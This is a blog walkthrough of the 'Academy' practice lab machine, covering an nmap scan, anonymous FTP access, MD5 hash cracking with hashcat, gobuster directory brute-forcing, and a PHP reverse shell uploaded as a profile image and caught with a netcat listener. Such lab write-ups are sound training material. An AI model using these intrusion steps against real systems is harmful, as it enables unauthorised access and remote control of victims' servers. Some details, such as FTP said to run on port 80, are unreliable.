Open in app

Sign in

Write

Sign in

Academy001 Walk-thorough

Syed Abeer Ahmed
7 min readOct 4, 2023

Setting up the Box

To begin, we need to set up the box. Obtain the IP address of our box by using the following command:

ip a
Academy Box Terminal

Checking if the Target is Alive

Next, we need to check if our target, the vulnerable box of the academy, is alive. Ping it from our KALI machine using the following command:

ping #ip of your vulnerable box
Kali Terminal

Scanning for Open Ports

We now know that our target machine is alive. We can scan it to see if any ports are open using the Nmap tool with the following command:

nmap -A #ip

The -A flag in the Nmap tool enables aggressive scanning, which includes various advanced options. It performs OS detection, version detection, script scanning, and traceroute. This flag provides more comprehensive information about the target machine during the scanning process.

Kali Terminal

We can see that the FTP service is open at port 80 and the HTTP service is also open at port 80.

Accessing the FTP Server

Moreover, we have enabled Anonymous FTP login for our FTP service, which means we can log in to the FTP server without credentials or with just the username without providing a password.

To access Anonymous FTP, use the following command:

ftp #ip

For the username, simply enter “anonymous" and for the password, leave it empty and hit enter.

Kali Terminal

Copying Files from the FTP Server

Now, let’s see if we find anything useful and copy the contents to our KALI system.

We used the “ls" command to see the files inside the directory and copied them to our current directory inside KALI using the "get filename" command. Press "ctrl^c" to exit the FTP server and check if the file is copied using "ls" (ignore the "grep").

Kali Terminal

Viewing the Contents of the File

Use “cat” to view the contents of “note.txt”.

Kali Terminal

From the contents of the file, we discovered a username and a password (in HASH format) for a student account.

Cracking the Hashed Password

Let’s try cracking the hashed password. First, we will determine the hash type using “hash-identifier".

You may need to extract the “rockyou.txt.gz" password list in the "/usr/share/wordlists/" directory using the command:

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

Now, since we know the hash type, we can use “hashcat" and "rockyou.txt" to crack the hash.

hashcat -m 0 -a 0 -O cd73502828457d15655bbd7a63fb0bc8 /usr/rockyou.txt

Here are the flags used:

  1. hashcat: This is the command to invoke the hashcat tool.
  2. m 0: This flag specifies the hash type or mode. In this case, m 0 corresponds to MD5 hashes. Hashcat supports various hash types, and the numeric code is used to specify which type of hash you are trying to crack.
  3. a 0: This flag specifies the attack mode. In this case, a 0 corresponds to a straight dictionary attack. A dictionary attack involves trying all the words from a given wordlist (in this case, /usr/rockyou.txt) to see if any of them match the hashed value.
  4. O: This flag enables the optimized kernel. It instructs hashcat to use optimized code paths for better performance.
  5. cd73502828457d15655bbd7a63fb0bc8: This is the hash value that you want to crack. Hashcat will attempt to find the original input that produced this hash value by trying various combinations from the wordlist.
  6. /usr/rockyou.txt: This is the path to the wordlist file that hashcat will use for the dictionary attack. The rockyou.txt wordlist is a popular and commonly used wordlist in password cracking due to its extensive collection of commonly used passwords.
Kali Terminal

We successfully cracked the password, which is “student”.

Finding the Website Directory

Now, we need to find the website directory where we can use these login details to sign in using the Directory busting technique with the “gobuster" tool.

Kali Terminal

gobuster: This is the name of the tool you are running. Gobuster is a popular directory and file brute-forcing tool used for web application security testing and penetration testing.

  1. dir: This flag specifies the mode in which Gobuster should operate. In this case, it's set to "dir," indicating that Gobuster should perform directory brute-forcing.
  2. u 192.168.100.234:80: This flag specifies the target URL that Gobuster should scan. It tells Gobuster to scan the web server running at the IP address 192.168.100.234 on port 80 (HTTP).
  3. w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: This flag specifies the wordlist that Gobuster should use to generate directory and file paths for scanning. In this case, the wordlist is located at the specified path: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt. Gobuster will use the entries in this wordlist to construct URLs and check if they exist on the target web server.

We have found the “academy” and “phpmyadmin” directories on the given URL. Let’s visit the “academy” directory and see if we can use the cracked credentials on the site.

To visit, simply type “192.168.100.234:80/academy” in your browser.

Firefox Browser

Logging in to the Website

Let’s use the username (from the note.txt) and cracked password on the site.

Firefox Browser

Voila! We have successfully logged in.

Firefox Browser

lets visit all other pages that are available to us, upon exploring the My Profile we can see that we are able to upload profile image to the portal , this information is useful since we can use this to execute a reverse shell script.

Victim Website

if you recall things from early , during directory busting we found a phpadmin directory-busting so we can assume that the website is using a php server.

Kali Terminal

so we have to use a reverse shell script made for php server. you can download it from the following link:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

after downloading you will have to change 2 things for it to work , first the ip to which the script will connect to and the port , after downloading the script open it in your favourite editor and make the following changes:

Kali Linux

after making the changes , start the listener on your kali machine :

nc -lvnp 443
  1. nc: This is the command itself, which stands for "netcat." Netcat is a versatile networking utility that can be used for various network-related tasks, such as creating network connections, transferring data, and port scanning.
  2. l: This flag tells nc to listen for incoming connections. When you use the l option, nc acts as a server, waiting for incoming data or connections.
  3. v: This flag enables verbose mode, which means nc will provide more detailed output, including information about the connection, data transfer, and any errors that may occur.
  4. n: This flag tells nc not to perform DNS resolution on IP addresses. In other words, it uses numeric addresses instead of resolving hostnames. This can be useful to avoid delays caused by DNS lookups.
  5. p 443: This flag specifies the port number to listen on. In this case, 443 is the port number. Port 443 is commonly associated with HTTPS (secure web) traffic, and it's often used for secure web server communications.

lets upload our script at the place of profile image and execute it by opening it into new page.

Victim Website

now open the image into new tab to execute the script but make sure first the listener is still running :

Victim Website

upon clicking the open image in new tab option , the php reverse shell script gets executed and we get the bash of the victim on our kali terminal

congratulations , our walkthrough finishes here!

Kali Linux
Academy001
Hacking
Infosec Write Ups
Cybersecurity

--

--

Syed Abeer Ahmed
Syed Abeer Ahmed

Written by Syed Abeer Ahmed

24 followers
28 following

Cybersecurity | CS Tutor | Software Engineer | Flutter Dev

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech